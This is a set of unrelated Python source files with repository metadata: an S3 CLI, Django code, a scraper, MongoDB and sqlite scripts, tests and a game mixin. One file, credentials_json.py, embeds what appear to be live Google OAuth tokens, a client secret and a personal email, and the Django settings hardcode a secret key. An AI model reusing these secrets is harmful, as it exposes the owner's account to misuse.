807c07dbe3578db5526f3e48ffc342fbfaf387a1 | af9ae1161026c2d58390737a5a149034668b16a8 | /01-webotron/webotron/webotron.py | 1bc1263ff53beb8f284741cc015d0748d0f9f537 | [] | no_license | jimbol60/auto-aws-w-python | 82bce75e5643bfb1af35b84d8783cfb88b7910c3 | 3b9c66588ad61a220455761497d1c7cdcc5eda7a | refs/heads/master | 2020-04-20T04:46:13.626125 | 2019-06-15T16:38:00 | 2019-06-15T16:38:00 | 168,637,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 1 10:46:38 2019
1
@author: Jim
"""
import boto3
import click
session = boto3.Session(profile_name='pythonAutomation')
s3 = session.resource('s3')
@click.group()
def cli():
    "Webotron deploys websites to AWS"
    # click renders the docstring above as the group's help text; the
    # function body itself intentionally does nothing.
""" the @click is a decorator [this wraps a function] """
@cli.command('list-buckets')
def list_buckets():
    "List all s3 buckets"
    # Print every bucket visible to the configured boto3 session.
    for each_bucket in s3.buckets.all():
        print(each_bucket)
@cli.command('list-bucket-objects')
@click.argument('bucket')
def list_bucket_objects(bucket):
    "List objects in an s3 bucket"
    # `bucket` is the bucket name supplied on the command line.
    for s3_object in s3.Bucket(bucket).objects.all():
        print(s3_object)
if __name__ == '__main__':
cli() | [
"jbolinder60@gmail.com"
] | jbolinder60@gmail.com |
e6c64fa2264290c17763d19942f3cc545b1e6ebe | 7089b86f90d855c7862d0b408e61a67725d0c254 | /website/migrations/0037_auto_20210129_1257.py | 9e69d14b79cb6b3aa11f06ebd0ac33962a22f43b | [] | no_license | samozzy/codamotion | 784fdeb99216f030a53f27a3c1f22041743b41f3 | 6a4a85852023d01b13459fa0cb644f1855eb752a | refs/heads/master | 2023-03-06T23:39:12.876150 | 2021-02-23T19:47:53 | 2021-02-23T19:47:53 | 334,784,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,129 | py | # Generated by Django 3.1.5 on 2021-01-29 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; adds the SiteMenu model,
    # widens TeamMember.person_type choices, and links Page to SiteMenu.

    dependencies = [
        ('website', '0036_auto_20210125_2315'),
    ]

    operations = [
        # New model: a menu slot, restricted to one Header and one Footer row.
        migrations.CreateModel(
            name='SiteMenu',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(choices=[('H', 'Header'), ('F', 'Footer')], default='H', max_length=1, unique=True)),
            ],
            options={
                'verbose_name': 'Menu',
                'verbose_name_plural': 'Menus',
            },
        ),
        # Replace the previous person_type choice set on TeamMember.
        migrations.AlterField(
            model_name='teammember',
            name='person_type',
            field=models.CharField(choices=[('KEYC', 'Key Contact'), ('MGMT', 'Management'), ('ADVS', 'Advisors')], default='KEYC', max_length=4),
        ),
        # A page may now be attached to any number of menus.
        migrations.AddField(
            model_name='page',
            name='menu',
            field=models.ManyToManyField(to='website.SiteMenu'),
        ),
    ]
| [
"sam.tosborne@googlemail.com"
] | sam.tosborne@googlemail.com |
0c69214c33df80c1751a55ac48cf6d6cda486d5e | cd5814f1b364f290b44b1ad5e716318bedbd7782 | /test/Baike.py | 0def782d0674a877bd56e8ee640929b9e8d245d7 | [] | no_license | KingJA/KExcavator | a842abe28af516eec4b561b33d06e6214e4d36a7 | ab4273b8a149592936527a5d1b959aba85eb1f82 | refs/heads/master | 2021-01-22T07:57:35.151420 | 2017-05-27T09:29:23 | 2017-05-27T09:29:23 | 82,655,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | import re
from urllib.request import *
class Spider:
    """Console reader that fetches and shows hot jokes from qiushibaike.com."""

    def __init__(self):
        self.page = 1  # next page number to request
        # Impersonate a desktop Chrome browser so the site serves normal HTML.
        self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36r)'
        self.headers = {'User-Agent': self.user_agent}
        self.stories = []  # parsed stories for the most recently fetched page

    def get_stories(self):
        """Fetch one page and parse (author, body, image-info, vote-count) tuples."""
        try:
            url = 'http://www.qiushibaike.com/hot/page/' + str(self.page)
            request = Request(url, headers=self.headers)
            self.page += 1  # advance so the next call fetches the next page
            response = urlopen(request)
            # BUG FIX: an HTTP response body can only be read once.  The
            # original code printed response.read() and then called read()
            # again, so the second read returned an empty string and no
            # stories were ever parsed.  Read once, reuse the text.
            html = response.read().decode("UTF-8")
            print(html)
            content = html.replace("<br/>", "\n")
            # Capture groups: author, body, optional image info, vote count.
            pattern = re.compile('alt="(.*?)".*?"content">\n(.*?)<!--(.*?)"number">(.*?)</i> 好笑', re.S)
            self.stories = re.findall(pattern, content)
        except URLError as e:
            if hasattr(e, "reason"):
                print("获取失败,错误原因", e.reason)
            return None

    def start(self):
        """Interactive loop: show one text-only story per <Enter>, quit on Q/q."""
        print("{:^70}".format('正在读取糗事百科'))
        while True:
            self.get_stories()
            for story in self.stories:
                # Skip stories that include an image.
                if not re.search('img', story[2]):
                    Input = input("{:^70}".format('回车查看新段子, Q 键退出程序\n'))
                    # BUG FIX: the original used `Input is 'Q'`, an identity
                    # comparison that only worked by CPython's single-char
                    # string caching; compare by value instead.
                    if Input in ('Q', 'q'):
                        print("{:^70}".format('再见'))
                        return
                    print('{:^70}'.format('第{}页 作者:{} 赞数{}').format(self.page - 1, story[0], story[3]))
                    print('{}\n'.format(story[1]))
            print("{:^70}".format('翻个页 TwT'))


spider = Spider()
spider.start()
| [
"JM273606@gmail.com"
] | JM273606@gmail.com |
3f4c50e048de35cf36b72fbd342a74a9bc8a9b08 | e4d12842108f5c9cf95408638cbea5ae56cd14e6 | /pkg9_include/icld3_base64.py | cfa8c2e86ba94ca3760374d11fb114fa385f34e9 | [] | no_license | TinloneX/Learning-Python | 22d6207ad6a20a908b91da7d2bc55eacbfa5e0b2 | b1b6d78915b567e3b69b1639495a44672a3b0ce2 | refs/heads/master | 2021-10-09T20:29:24.596230 | 2019-01-03T07:43:25 | 2019-01-03T07:43:25 | 108,959,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,069 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python 学习笔记 之 常用内建模块(3)
# base64
# 快速打印
from util import p
import base64
# --- b64encode / b64decode
b1 = base64.b64encode(b'binary\x00string')
p('字符转base64', b1)
d1 = base64.b64decode(b1)
p('base64转字符', d1)
# --- urlsafe_b64encode
b2 = base64.b64encode(b'i\xb7\x1d\xfb\xef\xff')
p('含+/的二进制数据b64', b2)
ub = base64.urlsafe_b64encode(b'i\xb7\x1d\xfb\xef\xff')
p('含+/的urlsafe转b64', ub)
ud = base64.urlsafe_b64decode(ub)
def b64_eq_decode(s):
    """Decode base64 bytes whose trailing '=' padding may have been stripped.

    Re-pads the input to a multiple of four bytes before decoding, prints the
    decoded value via the project helper ``p``, and returns it.
    """
    remainder = len(s) % 4
    if remainder != 0:
        # base64 input must be a multiple of 4 bytes; restore the padding.
        s += b'=' * (4 - remainder)
    decoded = base64.b64decode(s)
    p(decoded)
    return decoded
# 验证有'='及去掉'='的解码结果
bo = b64_eq_decode(b'YWJjZA==') == b64_eq_decode(b'YWJjZA')
p(bo)
| [
"zhaojl@wenduing.com"
] | zhaojl@wenduing.com |
7955553baca04941d72f29dac6fb5ccbd9d159a9 | d55842114d818b39b5a05fbe5af39f941462799b | /test_storm/settings.py | 04c31594204700a609cadd96f671e3b6a40d3d1e | [] | no_license | Nataliel/test_storm | 85a67307d70230f7ac34adf64556df97e0990851 | 3663c956c03e54b794078b4c0a6bb2de42a62c35 | refs/heads/master | 2021-03-12T20:05:52.735039 | 2015-07-04T23:37:35 | 2015-07-04T23:37:35 | 38,549,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,088 | py | """
Django settings for test_storm project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from decouple import config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (os.path.join(MEDIA_ROOT, 'static'),)
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = ['*']
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3p(%ny#=g&ja6a=o021+a&j9gwh-gmv=b-pr@x=xj@d0h0!*(9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', cast=bool)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.request',
)
# Application definition
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'website',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'test_storm.urls'
WSGI_APPLICATION = 'test_storm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# Database connection, fully driven by environment variables via python-decouple.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.%s' % config('DB_ENGINE'),
        'NAME': config('DB_NAME'),
        'USER': config('DB_USER'),
        'PASSWORD': config('DB_PASSWORD', default=''),
        'HOST': config('DB_HOST', default='localhost'),
        # BUG FIX: the port was read with cast=bool, turning DB_PORT into
        # True/False.  Django expects a string (or int); an empty string
        # means "use the backend's default port".
        'PORT': config('DB_PORT', default=''),
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
GRAPPELLI_ADMIN_TITLE = 'Storm Security'
CKEDITOR_UPLOAD_PATH = os.path.join(MEDIA_ROOT, 'uploads/ckeditor')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': [
# {'name': 'document', 'items': ['Source', '-', 'Save', 'NewPage','DocProps','Preview','Print','-','Templates' ] },
{'name': 'clipboard', 'items': ['Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', '-', 'Undo', 'Redo' ]},
{'name': 'editing', 'items': ['Find', 'Replace', '-', 'SelectAll', '-', 'SpellChecker', 'Scayt']},
{'name': 'links', 'items': ['Link', 'Unlink']},
{'name': 'insert', 'items': ['Image', 'Flash', 'Table', 'HorizontalRule', 'SpecialChar', 'PageBreak', 'Iframe']},
'/',
{'name': 'basicstyles', 'items': ['Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'RemoveFormat']},
{'name': 'paragraph', 'items': ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'CreateDiv',
'-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl']},
'/',
{'name': 'styles', 'items': ['Styles', 'Format', 'Font', 'FontSize']},
{'name': 'colors', 'items': ['TextColor', 'BGColor']},
{'name': 'tools', 'items': ['Maximize', 'ShowBlocks']}
],
'height': 0,
'width': 0,
},
}
| [
"nataliel.vasconcelos@gmail.com"
] | nataliel.vasconcelos@gmail.com |
08bfcedacd7477241c82042f91ec82ea9206394b | ddd60df07380bf9ac4f1e80c88728e5dc1822347 | /project3.py | 6f876c0eaad66b0b162675fc6541a5dc2a38bf8c | [] | no_license | smorram1/Database-project3 | b837fef5f283cde099415d01e32ca5efaa587deb | 5d8f05dca44969b1a8bcaed9c3e5dffeeff074c9 | refs/heads/master | 2022-05-27T00:05:32.589487 | 2020-05-01T22:41:34 | 2020-05-01T22:41:34 | 260,571,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,209 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 1 01:22:17 2020
@author: saipavankalyan,sai sandeep reddy
"""
from pymongo import MongoClient
def location(collection):
#The Location where more accidents are happening
accident=collection.aggregate([{'$group' : {'_id' : '$LocalAuthority',
'highest_accidents_city' : {'$sum' : 1}}},
{'$sort':{'highest_accidents_city':-1}},{'$limit':1}])
#Printing the data inserted
totalaccident=list(accident)
print("The Location were more accidents are happening : ",totalaccident[0]["_id"])
def severity(collection):
#Severity at Particular Location
serv = input("enter a city name:")
severe=collection.aggregate([{'$group':{'_id' : '$LocalAuthority',
'percent': {'$avg':{'$toDouble':'$Accident_Severity'}}}},
{'$match':{'_id':serv}}])
servloc=list(severe)
print('Severity at '+serv+" is",servloc[0]["percent"])
#sPEED LIMIT
def speedlimit(collection):
speed=collection.aggregate([{'$group' : {'_id' : '$Speed_limit', 'Frequency' : {'$sum' : 1}}},{'$sort':{'Frequency':-1}},{'$limit':1}])
speedlim=list(speed)
print("At this speed most accidents are happening :",speedlim[0]["_id"]+" mph")
def urbanrural(collection):
Urban=collection.aggregate([{'$group' : {'_id' : '$Urban_or_Rural_Area','Urban':{'$sum':1}}},{'$match':{'_id':'1'}}])
Rural=collection.aggregate([{'$group' : {'_id' : '$Urban_or_Rural_Area','Rural':{'$sum':1}}},{'$match':{'_id':'2'}}])
Total=collection.aggregate([{'$group' : {'_id' : 'null', 'Total' : {'$sum' : 1}}},{'$project': {'_id':0}}])
urbanlist=list(Urban)
rurallist=list(Rural)
total=list(Total)
urbanvalue=urbanlist[0]["Urban"]
ruralvalue=rurallist[0]["Rural"]
totalvalue=total[0]["Total"]
Final=((urbanvalue)/(totalvalue))*100
Final2=((ruralvalue)/(totalvalue))*100
print('Urban Percentage =',Final)
print('Rural Percentage =',Final2)
def conditions(collection):
Light=collection.aggregate([{'$group':{'_id' :{ 'light':'$Light_Conditions','weather':'$Weather_Conditions','Road_Surface':'$Road_Surface_Conditions'},
'Light':{'$sum' :1}}},{'$sort':{'Light':-1}},{'$limit':1}])
bettercond=list(Light)
print("The following are the factors contribute to most of accidents :")
print(bettercond[0]["_id"]['light'])
print(bettercond[0]["_id"]['weather'])
print(bettercond[0]["_id"]['Road_Surface'])
def day(Week):
    """Print the weekday name for a Day_of_Week code ("1" = Sunday ... "7" = Saturday).

    Unknown codes print None (dict.get default).
    """
    days = {
        "1": "Sunday", "2": "Monday", "3": "Tuesday", "4": "Wednesday",
        # BUG FIX: corrected the misspelled names "Thrusday" and "Saturaday".
        "5": "Thursday", "6": "Friday", "7": "Saturday",
    }
    print("The day of the week which is safest to travel :", days.get(Week))
def safeday(collection):
    """Find the weekday with the fewest recorded accidents and print its name."""
    pipeline = [
        {'$group': {'_id': '$Day_of_Week', 'Weekday': {'$sum': 1}}},
        {'$sort': {'Weekday': 1}},
        {'$match': {'_id': {'$nin': [None]}}},
        {'$limit': 1},
    ]
    week = list(collection.aggregate(pipeline))
    # Delegate the code-to-name translation and printing to day().
    day(week[0]["_id"])
def ped_cautious(collection):
    """Print the junction control where pedestrians near crossings see most accidents."""
    pipeline = [
        {'$group': {'_id': {'pedestrains': '$Pedestrian_Crossing-Physical_Facilities',
                            'junction': '$Junction_Control'},
                    'Pedestrains': {'$sum': 1}}},
        # Only consider records that actually have a physical crossing nearby.
        {'$match': {'_id.pedestrains': {'$nin': [None, 'No physical crossing within 50 meters']}}},
        {'$sort': {'Pedestrains': -1}},
        {'$limit': 1},
    ]
    top = list(collection.aggregate(pipeline))
    print("At this signals pedestrains must be cautious:", top[0]["_id"]["junction"])
def monthchar(no_of_month):
    """Map a zero-padded month number ("01".."12") to its English name.

    Raises KeyError for any other input, matching the original behavior.
    """
    months = {
        "01": "January", "02": "February", "03": "March", "04": "April",
        "05": "May", "06": "June", "07": "July", "08": "August",
        "09": "September", "10": "October", "11": "November", "12": "December",
    }
    return months[no_of_month]
def casualites(collection):
    """Print accident counts per month, derived from a substring of the Date field."""
    pipeline = [
        # Characters 3..4 of the Date string hold the month number.
        {'$project': {'month123': {'$substr': ['$Date', 3, 2]}}},
        {'$group': {'_id': '$month123', 'sum': {'$sum': 1}}},
        {'$sort': {'_id': 1}},
        {'$match': {'_id': {'$nin': ['']}}},
    ]
    for month in list(collection.aggregate(pipeline)):
        print(monthchar(month["_id"]) + ":", month["sum"])
if __name__ == "__main__":
    try:
        conn = MongoClient()
        print("Connected successfully!!!")
    except Exception:
        # BUG FIX: the original bare `except:` printed a message and then fell
        # through to use the undefined `conn`, crashing with a NameError.
        # Exit cleanly instead (and avoid swallowing KeyboardInterrupt).
        print("Could not connect to MongoDB")
        raise SystemExit(1)
    # database
    db = conn.database
    collection = db.project3
    while True:
        print()
        print("**********Welcome to Menu***************")
        print("1. Average Severity at Particular location")
        print("2. No. of Casualties per month")
        print("3. The Location where more accidents are happening ")
        print("4. which day of the week is safe to travel")
        print("5. Percentage of Urban and Rural")
        print("6. At which speed limit most accidents happened")
        print("7. What factors contribute to most of accidents")
        print("8. At which Traffic signals pedestrian must be cautious regarding traffic")
        print("9. exit")
        option = input("Select your Option: ")
        if option == "1":
            severity(collection)
        elif option == "2":
            casualites(collection)
        elif option == "3":
            location(collection)
        elif option == "4":
            safeday(collection)
        elif option == "5":
            urbanrural(collection)
        elif option == "6":
            speedlimit(collection)
        elif option == "7":
            conditions(collection)
        elif option == "8":
            ped_cautious(collection)
        elif option == "9":
            break
        else:
            print("enter a valid input")
| [
"noreply@github.com"
] | noreply@github.com |
b2006cbb7580f686445bb729d89f9d2782cd9c57 | 3f5504aff203cc15ca8754353991208962a04a90 | /src/the_tale/the_tale/game/heroes/shop_accessors.py | ee3911ac374e614437dcd8b8046989ebb6aca997 | [
"BSD-3-Clause"
] | permissive | Portal777/the-tale | 39614e60fa817a1e00e948a2b465fcb6be35e0c6 | 1a98294f6ed45d26bf5f09bdd2b4a931dbbb72e3 | refs/heads/master | 2021-08-24T01:46:11.472205 | 2017-11-04T13:31:30 | 2017-11-04T13:31:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # coding: utf-8
import random
from the_tale.game.balance.power import Power
from the_tale.game.artifacts.storage import artifacts_storage
from the_tale.game.cards import objects as cards_objects
class ShopAccessorsMixin(object):
    """Hero mixin with helpers that apply purchases made in the shop."""
    __slots__ = ()

    def purchase_energy_bonus(self, energy):
        # A bought energy pack is credited as bonus energy.
        self.add_energy_bonus(energy)

    def purchase_experience(self, experience):
        # Bought experience is applied to the hero immediately.
        self.add_experience(experience)

    def purchase_artifact(self, rarity, better):
        """Create a random artifact at the hero's level and put it in the bag."""
        distribution = self.preferences.archetype.power_distribution
        if better:
            power = Power.better_artifact_power_randomized(distribution, self.level)
        else:
            power = Power.artifact_power_randomized(distribution, self.level)
        artifacts_storage.sync()
        template = random.choice(artifacts_storage.artifacts)
        artifact = template.create_artifact(level=self.level,
                                            power=power,
                                            rarity=rarity)
        self.put_loot(artifact, force=True)
        # The new item may change hero plans, so ask for a replan.
        self.actions.request_replane()
        return artifact
| [
"a.eletsky@gmail.com"
] | a.eletsky@gmail.com |
61ce39cee06a71424604156a993f7a1719461fab | 7f980ec40d1b519657dd04031dc284b5f2e2f5b7 | /templates/credentials_json.py | 213a9080af6dddcc3417f933afc085e4470c85e8 | [] | no_license | kiote/calendar_app_old | 40ca8e2c95dee6cc30137cb2af2ded14fa3ab3ff | a4eee4652c4a6251e955a34d5f6d74d9309de55b | refs/heads/master | 2021-01-18T01:26:39.591257 | 2015-09-03T13:44:46 | 2015-09-03T13:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,998 | py | credentials_json = '{"id_token": {"email_verified": "true", "iat": 1440140555, "sub": "106463563386518781717", "exp": 1440144155, "at_hash": "DsD0wf9PcW5tKHeEN3MCTA", "aud": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com", "email": "krivich.ekaterina@gmail.com", "azp": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com", "iss": "accounts.google.com"}, "_module": "oauth2client.client", "token_response": {"id_token": "eyJhbGciOiJSUzI1NiIsImtpZCI6IjEzNmNiM2M5ZGI1M2Y5NjI3MTJkYWFjMTlkNTdiYmU2YjlhZWE1ZTcifQ.eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwiYXRfaGFzaCI6IkRzRDB3ZjlQY1c1dEtIZUVOM01DVEEiLCJhdWQiOiI2NDcxMDQ5NjA0MDctcmk0b3AxNWxucjJtaDk2NHJsZXF1M2Zmc2xpbnU5cHMuYXBwcy5nb29nbGV1c2VyY29udGVudC5jb20iLCJzdWIiOiIxMDY0NjM1NjMzODY1MTg3ODE3MTciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXpwIjoiNjQ3MTA0OTYwNDA3LXJpNG9wMTVsbnIybWg5NjRybGVxdTNmZnNsaW51OXBzLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiZW1haWwiOiJrcml2aWNoLmVrYXRlcmluYUBnbWFpbC5jb20iLCJpYXQiOjE0NDAxNDA1NTUsImV4cCI6MTQ0MDE0NDE1NX0.AmhN0q9-uLvTQ5nmfghFUaXeIPKIYoS4Sy25i4fFzfd2ns0akw52B5_58g1QyRVh_L7fCsq4WMOY98FvssZM24pUp2GgbbxjVelPZzwb6TZ8jjcjeF6N9r_PXKe08_23O2X20ZR3HDKPRBDCGjtQ9aIcsXE3v6fVQsXEoLxhWkrpUn9d2nJOz8twh2v9BSFafoAZCA2P9qnKgcZu_hJMgUtgK-rJF3Xo1xkUa71mbmIBBEVMHNJAOddSU3XKW5P0fQ7loEl_xhtfnuxiC_Bar5Azkl9I-1FaXMPn_ozjvDwv4tXYwmRe2xxCdlH3fD5zFtiQrXx8jLNa4K6JSb0YdA", "access_token": "ya29.1gFV0ahoz5YPCGum3iq1ghMPzK10TYeBBNcqOsReGCV-sb9CMl8gL8V7MJDyAR1K4ChLng", "expires_in": 3600, "token_type": "Bearer"}, "refresh_token": 
"null", "token_uri": "https://accounts.google.com/o/oauth2/token", "client_secret": "CfGty_X7fQACweNzZKo2i9YG", "revoke_uri": "https://accounts.google.com/o/oauth2/revoke", "access_token": "ya29.1gFV0ahoz5YPCGum3iq1ghMPzK10TYeBBNcqOsReGCV-sb9CMl8gL8V7MJDyAR1K4ChLng", "token_expiry": "2015-08-21T08:02:35Z", "invalid": "false", "user_agent": "null", "_class": "OAuth2Credentials", "client_id": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com"}'
| [
"krivich.ekaterina@gmail.com"
] | krivich.ekaterina@gmail.com |
5f2ce7121fa780c80dfe8ccdb8e31d4f67ad3753 | 56abd8f94a511ae0d163161cb2f5e0a91d4b8bed | /datahub/investment/test/test_validate.py | 1a5ffaa2fa0b35879bda1a796d8eb999cd128ab5 | [
"MIT"
] | permissive | cgsunkel/data-hub-api | 994c58bd975d902bf2bc44b415a5892919ff4539 | a92faabf73fb93b5bfd94fd465eafc3e29aa6d8e | refs/heads/develop | 2023-05-31T22:35:56.344904 | 2021-06-30T11:23:06 | 2021-06-30T11:23:06 | 303,947,456 | 0 | 0 | MIT | 2021-06-30T10:34:50 | 2020-10-14T08:14:46 | Python | UTF-8 | Python | false | false | 1,477 | py | from datetime import date
import pytest
from freezegun import freeze_time
from datahub.investment.validate import (
_is_provided_and_is_date_in_the_past,
is_provided_and_is_date_less_than_a_year_ago,
)
@pytest.mark.parametrize(
    'data_date,expected_result',
    (
        (date(2019, 2, 2), False),   # tomorrow (frozen clock): not in the past
        (date(2019, 2, 1), True),    # "today" counts as in the past
        (date(2019, 1, 31), True),   # yesterday
        (None, False),               # missing date
    ),
)
@freeze_time('2019-02-01')
def test_is_date_in_the_past(data_date, expected_result):
    """Tests that a given date is in the past."""
    assert _is_provided_and_is_date_in_the_past(data_date) is expected_result
@pytest.mark.parametrize(
    'post_data,expected_result',
    (
        (date(2019, 2, 1), True),    # "today" (frozen clock)
        (date(2019, 2, 2), False),   # future dates don't count
        (date(2019, 1, 31), True),   # yesterday
        (date(2017, 9, 30), False),  # more than a year back
        (None, False),               # missing value
        ({}, False),                 # wrong type
    ),
)
@freeze_time('2019-02-01')
def test_is_date_less_than_a_year_ago(post_data, expected_result):
    """Tests if a given date is within the last year."""
    assert is_provided_and_is_date_less_than_a_year_ago(post_data) is expected_result
| [
"marcus.patino-pan@digital.trade.gov.uk"
] | marcus.patino-pan@digital.trade.gov.uk |
96c42184cc0925686a9b9a85d6043098400f1cda | ec910a38e5b51fc6314337cdd90e7729071cd9dc | /sqla.py | 4adb4bfa4ed8c26c6d904f058ea685f7140edb61 | [] | no_license | silvercoder1/sql-hacking | 1acd18e66bc0f420a087d7418bf5e9372d7cd1ae | aa9c1a039310f90d5be045c4c4023bf1908ba0c3 | refs/heads/master | 2016-09-05T10:24:08.957712 | 2015-08-27T02:32:32 | 2015-08-27T02:32:32 | 41,395,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,105 | py | import sqlite3, csv
CITIES = [('Boston', 'MA', 600000),
('Los Angeles', 'CA', 38000000),
('Houston', 'TX', 2100000),
('Philadelphia', 'PA', 1500000),
('San Antonio', 'TX', 1400000),
('San Diego', 'CA', 130000),
('Dallas', 'TX', 1200000),
('San Jose', 'CA', 900000),
('Jacksonville', 'FL', 800000),
('Indianapolis', 'IN', 800000),
('Austin', 'TX', 800000),
('Detroit', 'MI', 700000)]
regions = [
('New York City', 'Northeast'),
('San Francisco', 'West'),
('Chicago', 'Midwest'),
('Houston', 'South'),
('Phoenix', 'West'),
('Boston', 'Northeast'),
('Los Angeles', 'West'),
('Houston', 'South'),
('Philadelphia', 'Northeast'),
('San Antonio', 'South'),
('San Diego', 'West'),
('Dallas', 'South'),
('San Jose', 'West'),
('Jacksonville', 'South'),
('Indianapolis', 'Midwest'),
('Austin', 'South'),
('Detroit', 'Midwest')
]
with sqlite3.connect("new.db") as conn:
cur = conn.cursor()
'''try:
cur.execute("DROP TABLE IF EXISTS population")
cur.execute("DROP TABLE IF EXISTS regions")
cur.execute("CREATE TABLE population(city TEXT, state TEXT, population INT)")
cur.execute("CREATE TABLE regions(city TEXT, region TEXT)")
except sqlite3.OperationalError:
print "table already exists"
try:
cur.executemany('INSERT INTO population VALUES(?, ?, ?)', CITIES)
cur.executemany('INSERT INTO regions VALUES(?, ?)', regions)
except sqlite3.OperationalError as e:
print "city and/or region data already exists"
print e'''
cur.execute('''SELECT DISTINCT population.city, population.population, regions.region FROM
population,regions WHERE population.city=regions.city ORDER BY population.city ASC''')
rows = cur.fetchall()
for row in rows:
print row[0], row[1], row[2]
| [
"vikrambahl@svram.local"
] | vikrambahl@svram.local |
19f2f4ba687e70f40c6c6684f09ea6f92ba1cdce | dd018e9d6777e26aa759fe4efc01ae8ba344a39f | /.PyCharmCE2018.1/system/python_stubs/-1247971763/hpmudext.py | ec355ad6f857fae7ce8789bc58faa8573e268962 | [] | no_license | sofiajatsunda/lits--project | d2ffafd021b6815f72287dd52af33aa63607064b | 2fb4c165e74491eb6e26606ff481c7c5c54c9ed5 | refs/heads/master | 2020-03-21T09:15:03.786745 | 2018-06-23T10:01:19 | 2018-06-23T10:01:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | # encoding: utf-8
# module hpmudext
# from /usr/lib/python3/dist-packages/hpmudext.cpython-36m-x86_64-linux-gnu.so
# by generator 1.145
""" Python extension for HP multi-point transport driver """
# no imports
# Variables with simple values
HPMUD_BUFFER_SIZE = 16384
HPMUD_BUS_ALL = 3
HPMUD_BUS_NA = 0
HPMUD_BUS_PARALLEL = 2
HPMUD_BUS_USB = 1
HPMUD_DOT4_BRIDGE_MODE = 5
HPMUD_DOT4_MODE = 3
HPMUD_DOT4_PHOENIX_MODE = 4
HPMUD_MLC_GUSHER_MODE = 6
HPMUD_MLC_MISER_MODE = 7
HPMUD_RAW_MODE = 1
HPMUD_R_DATFILE_ERROR = 48
HPMUD_R_DEVICE_BUSY = 21
HPMUD_R_INVALID_CHANNEL_ID = 30
HPMUD_R_INVALID_DESCRIPTOR = 3
HPMUD_R_INVALID_DEVICE = 2
HPMUD_R_INVALID_DEVICE_NODE = 38
HPMUD_R_INVALID_DEVICE_OPEN = 37
HPMUD_R_INVALID_IP = 45
HPMUD_R_INVALID_IP_PORT = 46
HPMUD_R_INVALID_LENGTH = 8
HPMUD_R_INVALID_SN = 28
HPMUD_R_INVALID_STATE = 31
HPMUD_R_INVALID_TIMEOUT = 47
HPMUD_R_INVALID_URI = 4
HPMUD_R_IO_ERROR = 12
HPMUD_R_IO_TIMEOUT = 49
HPMUD_R_OK = 0
HPMUD_S_CONFIG_DOWNLOAD_CHANNEL = 'HP-CONFIGURATION-DOWNLOAD'
HPMUD_S_CONFIG_UPLOAD_CHANNEL = 'HP-CONFIGURATION-UPLOAD'
HPMUD_S_DEVMGMT_CHANNEL = 'HP-DEVMGMT'
HPMUD_S_EWS_CHANNEL = 'HP-EWS'
